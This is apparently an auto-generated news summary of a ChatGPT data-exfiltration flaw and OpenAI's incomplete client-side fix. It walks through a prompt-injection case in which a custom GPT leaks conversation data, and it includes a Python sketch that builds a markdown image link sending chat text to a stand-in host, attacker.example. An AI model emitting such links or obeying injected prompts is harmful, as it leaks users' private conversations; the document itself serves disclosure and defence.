December 21, 2023 at 11:49AM
OpenAI has addressed a data exfiltration bug in ChatGPT that could leak conversation details to an external URL. The fix adds client-side checks, but it is not perfect, and attackers may still be able to exploit it under certain conditions. The safety checks have not yet been implemented in the iOS app, leaving the risk unaddressed there. The issue was reported by security researcher Johann Rehberger.
Based on the report, here are the key takeaways:
1. OpenAI has mitigated a data exfiltration bug in ChatGPT that could leak conversation details to an external URL, but the mitigation is not perfect and attackers can still exploit it under certain conditions.
2. The safety checks that prevent data leaks have not yet been implemented in the ChatGPT iOS mobile app, leaving the risk unaddressed on that platform.
3. A security researcher discovered a technique to exfiltrate data from ChatGPT and reported it to OpenAI. Despite the researcher’s efforts, OpenAI’s response and mitigation have been incomplete.
4. The researcher publicly disclosed the flaws and demonstrated how a custom GPT named “The Thief!” could exfiltrate conversation data to an external URL (a sketch of the technique appears after this list).
5. OpenAI responded with client-side checks that call a validation API to keep images from unsafe URLs from rendering, but the exact details of these checks are not fully known and discrepancies in their effectiveness have been observed (a sketch of such a check appears after this list).
6. The client-side validation call has not yet been implemented in the iOS mobile app, and it is unclear whether the fix was rolled out to the ChatGPT Android app, leaving those platforms at risk.
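
To make takeaway 4 concrete, here is a minimal sketch of how image-based exfiltration from a chat works. Everything in it (the `attacker.example` endpoint, the `q` parameter, the helper name) is hypothetical and for illustration only; the report does not describe the actual payload used by “The Thief!”.

```python
from urllib.parse import quote

# Hypothetical attacker-controlled endpoint -- illustrative only,
# not taken from the report.
ATTACKER_ENDPOINT = "https://attacker.example/log"

def exfiltration_markdown(conversation_snippet: str) -> str:
    """Build the markdown image an injected prompt would ask the model to emit.

    When the chat client renders this image, the user's browser requests the
    URL, delivering the URL-encoded conversation data to the attacker's server.
    """
    return f"![loading]({ATTACKER_ENDPOINT}?q={quote(conversation_snippet)})"

print(exfiltration_markdown("user's secret question"))
# ![loading](https://attacker.example/log?q=user%27s%20secret%20question)
```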
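
For takeaway 5, the exact details of OpenAI’s validation call are not fully known, so the following is only a sketch of what a fail-closed client-side URL check could look like. The endpoint, the `url` parameter, and the `safe` response field are all assumptions, not OpenAI’s actual API.

```python
import requests

# Hypothetical validation endpoint -- the real check's details are undocumented.
VALIDATION_API = "https://chat.example/backend/url_safe"

def should_render_image(image_url: str) -> bool:
    """Ask the validation API whether an image URL is safe to render.

    Fails closed: any network error or malformed response means the image
    is not rendered, so an unreachable check never lets data leak.
    """
    try:
        resp = requests.get(VALIDATION_API, params={"url": image_url}, timeout=2)
        resp.raise_for_status()
        return bool(resp.json().get("safe", False))
    except (requests.RequestException, ValueError):
        return False
```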
These takeaways highlight ChatGPT’s ongoing vulnerability and OpenAI’s incomplete mitigation, particularly the gaps in the safety checks for image URLs and the missing implementation in the iOS mobile app. This information may be important for further action and decision-making regarding the security of ChatGPT.